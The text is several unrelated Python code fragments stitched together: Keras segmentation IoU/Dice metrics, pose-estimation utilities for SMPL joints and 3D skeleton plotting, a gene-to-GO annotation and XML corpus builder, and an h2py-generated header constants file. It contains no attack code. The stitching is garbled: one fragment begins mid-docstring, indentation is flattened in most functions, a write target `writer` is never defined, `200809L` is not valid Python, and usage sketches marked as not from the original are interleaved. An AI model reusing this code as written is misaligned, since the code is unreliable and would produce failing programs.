Dice(A,B) = 2*|A & B| / (|A| + |B|)
Args:
y_true: true masks, one-hot encoded.
y_pred: predicted masks, either softmax outputs, or one-hot encoded.
metric_name: metric to be computed, either 'iou' or 'dice'.
metric_type: one of 'standard' (default), 'soft', 'naive'.
In the standard version, y_pred is one-hot encoded and the mean
is taken only over classes that are present (in y_true or y_pred).
The 'soft' version of the metrics are computed without one-hot
encoding y_pred.
The 'naive' version returns mean metrics where absent classes contribute
to the class mean as 1.0 (instead of being dropped from the mean).
drop_last = True: boolean flag to drop last class (usually reserved
for background class in semantic segmentation)
mean_per_class = False: return mean along batch axis for each class.
verbose = False: print intermediate results such as intersection, union
(as number of pixels).
Returns:
IoU/Dice of y_true and y_pred, as a float, unless mean_per_class == True
in which case it returns the per-class metric, averaged over the batch.
Inputs are B*W*H*N tensors, with
B = batch size,
W = width,
H = height,
N = number of classes
"""
flag_soft = (metric_type == 'soft')
flag_naive_mean = (metric_type == 'naive')
# always assume one or more classes
num_classes = K.shape(y_true)[-1]
if not flag_soft:
# get one-hot encoded masks from y_pred (true masks should already be one-hot)
y_pred = K.one_hot(K.argmax(y_pred), num_classes)
y_true = K.one_hot(K.argmax(y_true), num_classes)
# if already one-hot, could have skipped above command
# keras uses float32 instead of float64, would give error down (but numpy arrays or keras.to_categorical gives float64)
y_true = K.cast(y_true, 'float32')
y_pred = K.cast(y_pred, 'float32')
# intersection and union shapes are batch_size * n_classes (values = area in pixels)
axes = (1,2) # W,H axes of each image
intersection = K.sum(K.abs(y_true * y_pred), axis=axes)
mask_sum = K.sum(K.abs(y_true), axis=axes) + K.sum(K.abs(y_pred), axis=axes)
union = mask_sum - intersection # or, np.logical_or(y_pred, y_true) for one-hot
smooth = .001
iou = (intersection + smooth) / (union + smooth)
dice = 2 * (intersection + smooth)/(mask_sum + smooth)
metric = {'iou': iou, 'dice': dice}[metric_name]
# define mask to be 0 when no pixels are present in either y_true or y_pred, 1 otherwise
mask = K.cast(K.not_equal(union, 0), 'float32')
if drop_last:
metric = metric[:,:-1]
mask = mask[:,:-1]
if verbose:
print('intersection, union')
print(K.eval(intersection), K.eval(union))
print(K.eval(intersection/union))
# return mean metrics: remaining axes are (batch, classes)
if flag_naive_mean:
return K.mean(metric)
# take mean only over non-absent classes
class_count = K.sum(mask, axis=0)
non_zero = tf.greater(class_count, 0)
non_zero_sum = tf.boolean_mask(K.sum(metric * mask, axis=0), non_zero)
non_zero_count = tf.boolean_mask(class_count, non_zero)
if verbose:
print('Counts of inputs with class present, metrics for non-absent classes')
print(K.eval(class_count), K.eval(non_zero_sum / non_zero_count))
return K.mean(non_zero_sum / non_zero_count)
def mean_iou(y_true, y_pred, **kwargs):
"""
Compute mean Intersection over Union of two segmentation masks, via Keras.
Calls metrics_k(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return seg_metrics(y_true, y_pred, metric_name='iou', **kwargs)
def Mean_IOU(y_true, y_pred):
nb_classes = K.int_shape(y_pred)[-1]
iou = []
true_pixels = K.argmax(y_true, axis=-1)
pred_pixels = K.argmax(y_pred, axis=-1)
void_labels = K.equal(K.sum(y_true, axis=-1), 0)
for i in range(0, nb_classes): # all labels; the void-label exclusion is commented out below
true_labels = K.equal(true_pixels, i)# & ~void_labels
pred_labels = K.equal(pred_pixels, i)# & ~void_labels
inter = tf.to_int32(true_labels & pred_labels)
union = tf.to_int32(true_labels | pred_labels)
legal_batches = K.sum(tf.to_int32(true_labels), axis=1)>0
ious = K.sum(inter, axis=1)/K.sum(union, axis=1)
iou.append(K.mean(tf.gather(ious, indices=tf.where(legal_batches)))) # returns average IoU of the same objects
iou = tf.stack(iou)
legal_labels = ~tf.debugging.is_nan(iou)
iou = tf.gather(iou, indices=tf.where(legal_labels))
return K.mean(iou)
def iou_vahid(y_true, y_pred):
    # nb_classes must be known statically for the Python loop below
    nb_classes = K.int_shape(y_true)[-1]
    true_pixels = K.argmax(y_true, axis=-1)
    pred_pixels = K.argmax(y_pred, axis=-1)
    iou = []
    for i in range(nb_classes):
        tp = K.sum(tf.to_int32(K.equal(true_pixels, i) & K.equal(pred_pixels, i)))
        fp = K.sum(tf.to_int32(K.not_equal(true_pixels, i) & K.equal(pred_pixels, i)))
        fn = K.sum(tf.to_int32(K.equal(true_pixels, i) & K.not_equal(pred_pixels, i)))
        iou.append(tp / (tp + fp + fn))
    return K.mean(tf.stack(iou))
def IoU_metric(Yi,y_predi):
## mean Intersection over Union
## Mean IoU = TP/(FN + TP + FP)
y_predi = np.argmax(y_predi, axis=3)
y_testi = np.argmax(Yi, axis=3)
IoUs = []
    Nclass = int(np.max(y_testi)) + 1  # count classes from the argmaxed labels, not the one-hot array
    for c in range(Nclass):
        TP = np.sum((y_testi == c) & (y_predi == c))
        FP = np.sum((y_testi != c) & (y_predi == c))
        FN = np.sum((y_testi == c) & (y_predi != c))
        IoU = TP / float(TP + FP + FN)
        IoUs.append(IoU)
    return np.mean(IoUs) | |
""" General Utilities file. """
import sys
import os
############################ NON-TF UTILS ##########################
from skimage.util import img_as_float
import numpy as np
import cv2
import pickle
from PIL import Image
from io import BytesIO
import math
import tqdm
import scipy
import json
import matplotlib
gui_env = ['Agg','TKAgg','GTKAgg','Qt4Agg','WXAgg']
for gui in gui_env:
    try:
        print("testing", gui)
        matplotlib.use(gui, force=True)  # note: the 'warn' kwarg was removed in matplotlib 3.x
        from matplotlib import pyplot as plt
        break
    except Exception:
        continue
print("utils.py Using:", matplotlib.get_backend())
from matplotlib.backends.backend_agg import FigureCanvasAgg as Canvas
from mpl_toolkits.mplot3d import Axes3D
import config as cfg
######### Basic Utils #########
def adjust_gamma(image, gamma=1.0):
""" Gamma correct images. """
## Build a LUT mapping the pixel values [0, 255] to their adjusted gamma values
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
## Apply gamma correction using the LUT
return cv2.LUT(image, table)
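# --- hedged usage sketch (not from the original file) ---
# Brightens a synthetic gradient image; gamma > 1 lifts mid-tones,
# gamma < 1 darkens them. Purely illustrative values.
def _demo_adjust_gamma():
    img = np.tile(np.arange(256, dtype=np.uint8), (32, 1))  # horizontal ramp
    bright = adjust_gamma(img, gamma=2.0)
    print(img[0, 128], '->', bright[0, 128])  # mid-grey is lifted (~128 -> ~180)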
def scipy_sharpen(img_flt, alpha=30):
""" Sharpen images. """
from scipy import ndimage
blurred_f = ndimage.gaussian_filter(img_flt, 3)
filter_blurred_f = ndimage.gaussian_filter(blurred_f, 1)
img_flt = blurred_f + alpha * (blurred_f - filter_blurred_f)
return img_flt
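# --- hedged usage sketch (not from the original file) ---
# Unsharp-mask style sharpening on random float data. Note the function
# sharpens the *blurred* image (blurred_f + alpha * detail), which is
# faithful to the scipy image-processing tutorial it appears to follow.
def _demo_scipy_sharpen():
    img = np.random.rand(64, 64).astype(np.float32)
    sharp = scipy_sharpen(img, alpha=30)
    print(sharp.shape, sharp.dtype)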
def read_pickle(path):
""" Load Pickle file. """
with open(path, 'rb') as f:
data = pickle.load(f)
return data
def save_pickle(data, path):
""" Save Pickle file. """
with open(path, 'wb') as f:
pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)
######### Pose quality and Metrics #########
def compute_similarity_transform(S1, S2):
""" Computes a similarity transform (sR, t) that takes
a set of 3D points S1 (3 x N) closest to a set of 3D points S2,
where R is an 3x3 rotation matrix, t 3x1 translation, s scale.
    i.e. solves the orthogonal Procrustes problem. """
transposed = False
if S1.shape[0] != 3 and S2.shape[0] != 3:
S1 = S1.T
S2 = S2.T
transposed = True
assert(S2.shape[1] == S1.shape[1])
## Mean
mu1 = S1.mean(axis=1, keepdims=True)
mu2 = S2.mean(axis=1, keepdims=True)
X1 = S1 - mu1
X2 = S2 - mu2
## Compute variance of X1 used for scale
var1 = np.sum(X1**2)
## The outer product of X1 and X2
K = X1.dot(X2.T)
## Solution that Maximizes trace(R'K) is R=U*V', where U, V are
## Singular vectors of K
U, s, Vh = np.linalg.svd(K)
V = Vh.T
## Construct Z that fixes the orientation of R to get det(R)=1
Z = np.eye(U.shape[0])
Z[-1, -1] *= np.sign(np.linalg.det(U.dot(V.T)))
## Construct R
R = V.dot(Z.dot(U.T))
## Recover scale
scale = np.trace(R.dot(K)) / var1
## Recover translation
t = mu2 - scale*(R.dot(mu1))
## Error
S1_hat = scale*R.dot(S1) + t
if transposed:
S1_hat = S1_hat.T
return S1_hat
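# --- hedged usage sketch (not from the original file) ---
# Verifies that compute_similarity_transform recovers a point cloud that was
# rotated, scaled and translated; R is a simple z-axis rotation and all
# numbers are made up.
def _demo_similarity_transform():
    rng = np.random.RandomState(0)
    S1 = rng.randn(3, 10)
    theta = 0.3
    R = np.array([[np.cos(theta), -np.sin(theta), 0],
                  [np.sin(theta),  np.cos(theta), 0],
                  [0, 0, 1]])
    S2 = 1.5 * R.dot(S1) + np.array([[1.0], [2.0], [3.0]])
    S1_hat = compute_similarity_transform(S1, S2)
    print('residual:', np.abs(S1_hat - S2).max())  # ~0 up to float error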
def compute_error(pred_3d_all, gt_3d_all, full_out=True):
""" MPJPE and PA_MPJPE metric computation. """
pred_3d_all_flat = pred_3d_all.copy()
pred_3d_all_flat = pred_3d_all_flat - pred_3d_all_flat[:, 0:1,:]
gt_3d_all_flat = gt_3d_all.copy()
gt_3d_all_flat = gt_3d_all_flat - gt_3d_all_flat[:, 0:1,:]
joint_wise_error = []
error = []
pa_joint_wise_error = []
pa_error = []
for i in range(len(pred_3d_all_flat)):
each_pred_3d = pred_3d_all_flat[i]
each_gt_3d = gt_3d_all_flat[i]
tmp_err = np.linalg.norm(each_pred_3d-each_gt_3d, axis=1)
joint_wise_error.append(tmp_err)
error.append(np.mean(tmp_err))
pred3d_sym = compute_similarity_transform(each_pred_3d.copy(), each_gt_3d.copy())
tmp_pa_err = np.linalg.norm(pred3d_sym-each_gt_3d, axis=1)
pa_joint_wise_error.append(tmp_pa_err)
pa_error.append(np.mean(tmp_pa_err))
joint_wise_error = np.array(joint_wise_error)
if(full_out):
mpjpe = np.mean(error)*1000 ### Note: unit is mm
pampjpe = np.mean(pa_error)*1000 ### Note: unit is mm
return mpjpe, pampjpe
else:
return error, pa_error
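# --- hedged usage sketch (not from the original file) ---
# MPJPE should be ~0 when predictions equal ground truth, and PA-MPJPE is
# additionally invariant to a global similarity transform of the prediction.
# Shapes follow the (N_frames, N_joints, 3) convention used above.
def _demo_compute_error():
    rng = np.random.RandomState(1)
    gt = rng.randn(4, 17, 3)
    mpjpe, pampjpe = compute_error(gt.copy(), gt, full_out=True)
    print(mpjpe, pampjpe)  # both ~0 (values reported in mm)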
###### Alternative manual regressors ######
def smplx45_to_17j(pose_smpl):
""" SMPLX 45 joint J3D to 17 joint J3D. """
## Remove fingers
pose_smpl = pose_smpl[:-10]
## Remove extra def feet
pose_smpl = pose_smpl[:-6]
## Remove face
pose_smpl = pose_smpl[:-5]
## Remove wrist
pose_smpl = pose_smpl[:-2]
## Remove extra def spine
pose_smpl = np.delete(pose_smpl, 3, 0) ## 3
pose_smpl = np.delete(pose_smpl, 5, 0) ## 6
pose_smpl = np.delete(pose_smpl, 7, 0) ## 9
## Remove torso
pose_smpl = np.delete(pose_smpl, 10, 0) ## 10
pose_smpl = np.delete(pose_smpl, 10, 0) ## 11
## Hip altitude increase and widen
alt_f = 0.8
wide_f = 8.0
pelvis = pose_smpl[0].copy()
r_hip = pose_smpl[2].copy()
l_hip = pose_smpl[1].copy()
## Alt inc
r_p_dir = pelvis - r_hip
l_p_dir = pelvis - l_hip
mag_rp = np.linalg.norm(r_p_dir)
r_p_dir /= mag_rp
mag_lp = np.linalg.norm(l_p_dir)
l_p_dir /= mag_lp
r_hip = r_hip + (r_p_dir*mag_rp*alt_f)
l_hip = l_hip + (l_p_dir*mag_lp*alt_f)
## H-Widen
hip_ctr = (r_hip + l_hip) / 2.0
r_dir = r_hip - hip_ctr
l_dir = l_hip - hip_ctr
## Unit vec
mag = np.linalg.norm(r_dir)
r_dir /= mag
l_dir /= np.linalg.norm(l_dir)
r_hip = r_hip + (r_dir*mag*wide_f)
l_hip = l_hip + (l_dir*mag*wide_f)
## place back
pose_smpl[2] = r_hip
pose_smpl[1] = l_hip
return pose_smpl
def smpl23_to_17j_3d(pose_smpl):
""" Simple SMPL 23 joint J3D to 17 joint J3D. """
smpl_to_17j = [ [0,1],[8,11],
[12],[17],[19], ### or 15 , 17
[13],[18], [20], ### or 16 , 18
[14],[0],[3],
[9,6],[9],[1],
[4],[10,7],[10] ]
pose_17j = np.zeros((len(smpl_to_17j),3))
for idx in range(len(smpl_to_17j)):
sel_idx = smpl_to_17j[idx]
if(len(sel_idx) == 2):
pose_17j[idx] = (pose_smpl[sel_idx[0]] + pose_smpl[sel_idx[1]]) / 2.0
else:
pose_17j[idx] = pose_smpl[sel_idx[0]]
return pose_17j
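# --- hedged usage sketch (not from the original file) ---
# Shape check only: the mapping table above indexes SMPL joints up to 20,
# so any (23, 3) joint array works. Values are random.
def _demo_smpl23_to_17j():
    pose = np.random.randn(23, 3)
    print(smpl23_to_17j_3d(pose).shape)  # (17, 3)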
""" SMPL J17 reordering vec. """
smpl_reorder_vec = [0, 9,
12, 14, 16,
11, 13, 15,
10,
2, 4, 6, 8,
1, 3, 5, 7 ]
def reorder_smpl17_to_j17(pose_3d):
""" SMPL reorder SMPL J17 to standard J17. """
pose_3d = pose_3d[smpl_reorder_vec]
return pose_3d
def smpl24_to_17j_adv(pose_smpl):
""" Improved SMPL 23 joint J3D to 17 joint J3D. """
## Hip altitude increase and widen
alt_f = 0.8
wide_f = 8.0
pelvis = pose_smpl[0].copy()
r_hip = pose_smpl[2].copy()
l_hip = pose_smpl[1].copy()
## Alt inc
r_p_dir = pelvis - r_hip
l_p_dir = pelvis - l_hip
mag_rp = np.linalg.norm(r_p_dir)
r_p_dir /= mag_rp
mag_lp = np.linalg.norm(l_p_dir)
l_p_dir /= mag_lp
r_hip = r_hip + (r_p_dir*mag_rp*alt_f)
l_hip = l_hip + (l_p_dir*mag_lp*alt_f)
## H-Widen
hip_ctr = (r_hip + l_hip) / 2.0
r_dir = r_hip - hip_ctr
l_dir = l_hip - hip_ctr
## Unit vec
mag = np.linalg.norm(r_dir)
r_dir /= mag
l_dir /= np.linalg.norm(l_dir)
r_hip = r_hip + (r_dir*mag*wide_f)
l_hip = l_hip + (l_dir*mag*wide_f)
## Place back
pose_smpl[2] = r_hip
pose_smpl[1] = l_hip
## Neck to head raise with tilt towards nose
alt_f = 0.7
head = pose_smpl[15].copy()
neck = pose_smpl[12].copy()
## Alt inc
n_h_dir = head - neck
mag_nh = np.linalg.norm(n_h_dir)
n_h_dir /= mag_nh
head = head + (n_h_dir*mag_nh*alt_f)
## Place back
pose_smpl[15] = head
## Remove wrist
pose_smpl = pose_smpl[:-2]
## Remove extra def spine
pose_smpl = np.delete(pose_smpl, 3, 0) ## 3
pose_smpl = np.delete(pose_smpl, 5, 0) ## 6
pose_smpl = np.delete(pose_smpl, 7, 0) ## 9
## Remove torso
pose_smpl = np.delete(pose_smpl, 10, 0) ## 10
pose_smpl = np.delete(pose_smpl, 10, 0) ## 11
return pose_smpl
def hip_straighten(pose_smpl):
""" Straighten Hip in J17. """
#pelvis = pose_smpl[0].copy()
r_hip = pose_smpl[2].copy()
l_hip = pose_smpl[1].copy()
pelvis = (r_hip + l_hip) / 2
pose_smpl[0] = pelvis
return pose_smpl
""" Limb parents for SMPL joints. """
limb_parents = [ 0,
0, 0, 0,
1, 2, 3, 4,
5, 6, 7, 8,
9, 9, 9,
12,12,12,
16,17,18,19,20,21
]
""" 3D skeleton plot colours for SMPL joints. """
colors = np.array([[0,0,255], [0,255,0], [255,0,0], [255,0,255], [0,255,255], [255,255,0], [127,127,0], [0,127,0], [100,0,100],
[255,0,255], [0,255,0], [0,0,255], [255,255,0], [127,127,0], [100,0,100], [175,100,195],
[0,0,255], [0,255,0], [255,0,0], [255,0,255], [0,255,255], [255,255,0], [127,127,0], [0,127,0], [100,0,100],
[255,0,255], [0,255,0], [0,0,255], [255,255,0], [127,127,0], [100,0,100], [175,100,195]])
def fig2data(fig):
""" Convert a Matplotlib figure to a 4D numpy array with RGBA channels. """
## Draw the renderer
fig.canvas.draw()
## Get the RGBA buffer from the figure
w, h = fig.canvas.get_width_height()
    buf = np.frombuffer(fig.canvas.tostring_argb(), dtype=np.uint8)  # np.fromstring was removed from NumPy
    buf = buf.reshape((h, w, 4))  # rows are the image height, not the width
## Roll the ALPHA channel to have it in RGBA mode
buf = np.roll(buf, 3, axis=2)
return buf
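# --- hedged usage sketch (not from the original file) ---
# Round-trips a tiny figure through fig2data; with the Agg backend this needs
# no display. Assumes a matplotlib version that still provides
# canvas.tostring_argb(). The result is an (H, W, 4) uint8 RGBA array.
def _demo_fig2data():
    fig = plt.figure(figsize=(2, 1), dpi=50)
    fig.gca().plot([0, 1], [0, 1])
    arr = fig2data(fig)
    plt.close(fig)
    print(arr.shape, arr.dtype)  # (50, 100, 4) uint8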
def draw_limbs_3d_plt(joints_3d, ax, limb_parents=limb_parents):
## Direct 3d plotting
for i in range(joints_3d.shape[0]):
x_pair = [joints_3d[i, 0], joints_3d[limb_parents[i], 0]]
y_pair = [joints_3d[i, 1], joints_3d[limb_parents[i], 1]]
z_pair = [joints_3d[i, 2], joints_3d[limb_parents[i], 2]]
#ax.text(joints_3d[i, 0], joints_3d[i, 1], joints_3d[i, 2], s=str(i))
ax.plot(x_pair, y_pair, z_pair, color=colors[i]/255.0, linewidth=3, antialiased=True)
def plot_skeleton_3d(joints_3d, flag=-1, limb_parents=limb_parents, title=""):
## 3D Skeleton plotting
fig = plt.figure(frameon=False, figsize=(7, 7))
ax = fig.add_subplot(1, 1, 1, projection='3d')
ax.clear()
## Axis setup
if (flag == 0):
ax.view_init(azim=0, elev=0)
elif (flag == 1):
ax.view_init(azim=90, elev=0)
ax.set_xlim(-200, 200)
ax.set_ylim(-200, 200)
ax.set_zlim(-200, 200)
scale = 1
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
draw_limbs_3d_plt(joints_3d * scale, ax, limb_parents)
ax.set_title(title)
plt_img = fig2data(fig)
plt.close(fig)
return plt_img
def skeleton_image(joints_2d, img):
""" 2D Joint skeleton Overlay. """
img_copy = img.copy()
for i in range(joints_2d.shape[0]):
x_pair = | |
import os
import collections
import sys
import re
import relations
#### GENE - GO DICTIONARY: GENE ID - (GO ID, EVIDENCE CODE, GO NAME, CATEGORY), (...) ####
def dict_g2go(file_g2go):
"""Creates a dictionary of type {gene1:[(GO_ID, Evidence, GO_name, category),
(GO_ID, Evidence, GO_name, category), ...], }
:param file_g2go: file with relations gene to GO
:return: dict of type {gene1:[(GO_ID, Evidence, GO_name, category),
(GO_ID, Evidence, GO_name, category), ...], }
"""
os.system('gunzip -k ' + file_g2go + '.gz')
gene2go = open(file_g2go, 'r', encoding = 'utf-8')
gene2go.readline() # skip header
relations_g2go = gene2go.readlines()
gene2go.close()
relations_g2go.pop()
dict_gene_go = {}
for line in relations_g2go:
line = line.split('\t')
gene_id = line[1]
go = line[2]
evidence = line[3]
name = line[5]
category = line[7][:-1]
        if gene_id not in dict_gene_go:
            dict_gene_go[gene_id] = []
        dict_gene_go[gene_id].append((go, evidence, name, category))
os.system('rm ' + file_g2go)
return dict_gene_go
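# --- hedged usage sketch (not from the original file) ---
# Builds a tiny gzipped gene2go-like file and parses it. The column layout
# (tax_id, GeneID, GO_ID, Evidence, Qualifier, GO_term, PubMed, Category)
# mirrors what the indexing above expects; file names are made up. Note that
# dict_g2go shells out to `gunzip`/`rm`, so this assumes a Unix-like system,
# and the .pop() above silently drops the file's final line.
def _demo_dict_g2go():
    import gzip
    rows = [
        "#tax_id\tGeneID\tGO_ID\tEvidence\tQualifier\tGO_term\tPubMed\tCategory\n",
        "9606\t1\tGO:0008150\tIEA\t-\tbiological_process\t-\tProcess\n",
        "9606\t1\tGO:0003674\tIEA\t-\tmolecular_function\t-\tFunction\n",
        "9606\t2\tGO:0008150\tIEA\t-\tbiological_process\t-\tProcess\n",  # dropped by .pop()
    ]
    with gzip.open("demo_gene2go.gz", "wt") as handle:
        handle.writelines(rows)
    print(dict_g2go("demo_gene2go"))
    # {'1': [('GO:0008150', 'IEA', 'biological_process', 'Process'),
    #        ('GO:0003674', 'IEA', 'molecular_function', 'Function')]}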
#### REPLACEMENT OF GENE ANNOTATIONS IN DIVIDED BY SENTENCES ANNOTATIONS FOR THEIR MOST REPRESENTATIVE GO ANNOTATION TO DIVIDED BY SENTENCES GO ANNOTATIONS ####
def go_annotations(annotations_path, file_g2go, destination_path):
"""Generates a file for each abstract with the correspondent phenotype and GO annotations,
creates a dictionary of type {gene_id:go_id, gene_id2:go_id, } and
a dictionary of type {gene_name:go_name, gene_name:go_name, }
:param annotations_path: divided by sentences annotations path
:param file_g2go: file with relations gene to GO
:param destination_path: destination path
:return: file for each abstract with the correspondent phenotype and GO annotations,
creates a dictionary of type {gene_id:go_id, gene_id2:go_id, } and
a dictionary of type {gene_name:go_name, gene_name:go_name, }
annotation file example:
26 29 negative regulation of cell proliferation GO_0008285
279 288 bilateral HP_0012832
313 323 unilateral HP_0012833
"""
dict_gene_id_go = dict_g2go(file_g2go)
dict_gene_go_id = {}
dict_gene_go_name = {}
for (dir_path, dir_names, file_names) in os.walk(annotations_path):
for filename in file_names:
annotation_file = open(annotations_path + filename, 'r', encoding = 'utf-8')
contents = annotation_file.readlines()
annotation_file.close()
annotation_file_go = open(destination_path + filename, 'w', encoding = 'utf-8')
save = 0
for line in contents:
line = line.split('\t')
start = int(line[0])
end = int(line[1])
if save != 0:
start = start + save
end = end + save
if line[3].startswith('HP'):
annotation_file_go.write(str(start) + '\t' + str(end) + '\t' + line[2] + '\t' + line[3])
else:
value = False
for key_g, value_tup in dict_gene_id_go.items():
if line[3][:-1] == key_g:
list_evidence = ['EXP', 'IDA', 'IPI', 'IMP', 'IGI', 'IEP', 'HTP',
'HDA', 'HMP', 'HGI', 'HEP', 'ISS', 'ISO', 'ISA',
'ISM', 'IGC', 'IBA', 'IBD', 'IKR', 'IRD', 'RCA',
'TAS', 'NAS', 'IC', 'ND', 'IEA'] # order criteria
bins = collections.defaultdict(list)
for pair in value_tup:
bins[pair[1]].append(pair)
value_tup = [pair for i in list_evidence for pair in bins[i]]
for v_tup in value_tup:
if v_tup[3] == 'Process': # Biological Process
value = True
end = int(line[1]) + len(v_tup[2]) - len(line[2]) + save
save = save + len(v_tup[2]) - len(line[2])
dict_gene_go_id[line[3][:-1]] = v_tup[0].replace(':', '_')
dict_gene_go_name[line[2]] = v_tup[2]
annotation_file_go.write(str(start) + '\t' + str(end) + '\t' + \
v_tup[2] + '\t' + v_tup[0].replace(':', '_') + '\n')
break
if not value: # genes with no associated GO terms or no associated GO terms from Biological Processes
end = int(line[1]) + len('biological_process') - len(line[2]) + save
save = save + len('biological_process') - len(line[2])
dict_gene_go_id[line[3][:-1]] = 'GO_0008150'
dict_gene_go_name[line[2]] = 'biological_process'
annotation_file_go.write(str(start) + '\t' + str(end) + '\t' + \
'biological_process' + '\t' + 'GO_0008150' + '\n')
annotation_file_go.close()
return dict_gene_go_id, dict_gene_go_name
#### XML FORMAT GENE AND PHENOTYPE CORPUS ####
def pgr_gene(verify_file, destination_path, type = None):
"""Generates a .xml file for each abstract with sentences with relations in corpus with the correspondent phenotype and gene annotations
:param verify_file: file with sentences with relations verified (for test corpus)
or file with sentences with relations not verified (for train corpus)
or file with all the relations (for corpus without curator correction)
:param destination_path: destination path
    :param type: (optional) set when the file to generate is a test corpus file
:return: .xml file for each abstract with sentences with relations in corpus with the correspondent phenotype and gene annotations of type:
<sentence id="s0" text="In addition, the coexistence of high MACC1 and low NM23-H1 expression and tumor budding
was associated with short OS (p AAAA 0.001).">
<entity id="s0.e1" charOffset="51-55"
type="GENE" text="NM23" ontology_id="4830"/>
<entity id="s0.e2" charOffset="74-79"
type="HP" text="tumor" ontology_id="HP_0002664"/>
<pair id="s0.p1" e1="s0.e1"
e2="s0.e2" pgr="true"/>
</sentence>
"""
verify = open(verify_file, 'r', encoding = 'utf-8')
verify.readline() # skip header
verify_relations = [line.split('\t') for line in verify]
verify.close()
verify_relations.sort(key=lambda x: int(x[0])) # sort by abstract identifier
iterator = 1
sentence_number = 1
entity_number = 1
pair_number = 1
dict_entities = {}
dict_pairs = {}
for line in verify_relations:
abstract = line[0]
sentence = line[1]
gene = line[2]
phenotype = line[3]
gene_id = line[4]
phenotype_id = line[5]
gene_start_position = line[6]
gene_end_position = line[7]
phenotype_start_position = line[8]
phenotype_end_position = line[9]
if type:
relation = line[10]
else:
relation = line[10][:-1]
if verify_relations[iterator - 2][0] == abstract: # same abstract
if verify_relations[iterator - 2][1] == sentence: # same sentence
if int(gene_start_position) < int(phenotype_start_position):
dict_entities[entity_number] = []
dict_entities[entity_number].append((gene, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + gene_start_position + '-' + \
gene_end_position + '"\n\t\t\t' + 'type="' + 'GENE' + '" text="' \
+ gene + '" ontology_id="' + gene_id + '"/>' + '\n'))
entity_number += 1
dict_entities[entity_number] = []
dict_entities[entity_number].append((phenotype, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + phenotype_start_position + '-' + \
phenotype_end_position + '"\n\t\t\t' + 'type="' + 'HP' + '" text="' \
+ phenotype + '" ontology_id="' + phenotype_id + '"/>' + '\n'))
entity_number += 1
else:
dict_entities[entity_number] = []
dict_entities[entity_number].append((phenotype, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + phenotype_start_position + '-' + \
phenotype_end_position + '"\n\t\t\t' + 'type="' + 'HP' + '" text="' \
+ phenotype + '" ontology_id="' + phenotype_id + '"/>' + '\n'))
entity_number += 1
dict_entities[entity_number] = []
dict_entities[entity_number].append((gene, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + gene_start_position + '-' + \
gene_end_position + '"\n\t\t\t' + 'type="' + 'GENE' + '" text="' \
+ gene + '" ontology_id="' + gene_id + '"/>' + '\n'))
entity_number += 1
dict_pairs[pair_number] = []
dict_pairs[pair_number].append(((entity_number - 2, entity_number - 1),'\t\t' + '<pair id="s' + str(sentence_number) + '.p' + str(pair_number) + '" e1="s' + str(sentence_number) + \
'.e' + str(entity_number - 2) + '"\n\t\t ' + 'e2="s' + str(sentence_number) + '.e' + str(entity_number - 1) + '" pgr="' + relation.lower() + '"/>' + '\n'))
pair_number += 1
else: # different sentence
pair_number = 1
entity_number = 1
list_entities = sorted(dict_entities.items())
used_entities_list = []
used_numbers_list = []
to_write_entities = []
right_number = 1
save_alterations = {}
for element in range(1, len(list_entities) + 1):
if list_entities[element - 1][1][0][0] not in used_entities_list:
to_write_entities.append(str(list_entities[element - 1][1][0][1]).replace('e' + str(list_entities[element - 1][0]), 'e' + str(right_number)))
used_entities_list.append(list_entities[element - 1][1][0][0])
used_numbers_list.append((list_entities[element - 1][1][0][0], element))
save_alterations['e' + str(list_entities[element - 1][0])] = 'e' + str(right_number)
right_number += 1
else:
for used_number in used_numbers_list:
if used_number[0] == list_entities[element - 1][1][0][0]:
save_alterations['e' + str(element)] = 'e' + str(used_number[1])
organized_writing = []
for line_to_write in to_write_entities:
first_offset = int(line_to_write.split('charOffset="')[1].split('"\n\t\t\t')[0].split('-')[0])
organized_writing.append((first_offset, line_to_write))
organized_writing = sorted(organized_writing, key=lambda tup: tup[0])
new_entity_number = 1
used_keys = []
for organized_tuple in organized_writing:
original_entity_number = int(organized_tuple[1].split('.e')[1].split('" charOffset="')[0])
writer.write(re.sub(r'.e[0-9]+', '.e' + str(new_entity_number), organized_tuple[1]))
for key, value in save_alterations.items():
if value == 'e' + str(original_entity_number) and key not in used_keys:
save_alterations[key] = 'e' + str(new_entity_number)
used_keys.append(key)
new_entity_number += 1
dict_entities = {}
list_pairs = sorted(dict_pairs.items())
for pair in list_pairs:
writer.write(str(pair[1][0][1].replace('.e' + str(pair[1][0][0][0]), '.' + save_alterations['e' + str(pair[1][0][0][0])]).replace('.e' + str(pair[1][0][0][1]), '.' + save_alterations['e' + str(pair[1][0][0][1])])))
dict_pairs = {}
writer.write('\t' + '</sentence>' + '\n')
sentence_number += 1
sentence = sentence.replace(' <', ' l').replace('(<', '(l').replace('(p<', '(pl').replace(' < ', ' l ').replace('."', '.AAAAA').replace('>', 'AAAA').replace('"', 'AAAAAA').replace('<','AAAA').replace('&', 'AAAAA').split('\n')[0] # avoid invalid (bad/not well-formed) XML
writer.write('\t' + '<sentence id="s' + str(sentence_number) + '" text="' + sentence + '">' + '\n')
if int(gene_start_position) < int(phenotype_start_position):
dict_entities[entity_number] = []
dict_entities[entity_number].append((gene,
'\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + gene_start_position + '-' + \
gene_end_position + '"\n\t\t\t' + 'type="' + 'GENE' + '" text="' \
+ gene + '" ontology_id="' + gene_id + '"/>' | |
# Generated by h2py from /usr/include/netinet/in.h
_NETINET_IN_H = 1
# Included from features.h
_FEATURES_H = 1
__USE_ANSI = 1
__FAVOR_BSD = 1
_ISOC99_SOURCE = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 200809L
_XOPEN_SOURCE = 700
_XOPEN_SOURCE_EXTENDED = 1
_LARGEFILE64_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
_ATFILE_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
__USE_ISOC99 = 1
__USE_ISOC95 = 1
_POSIX_SOURCE = 1
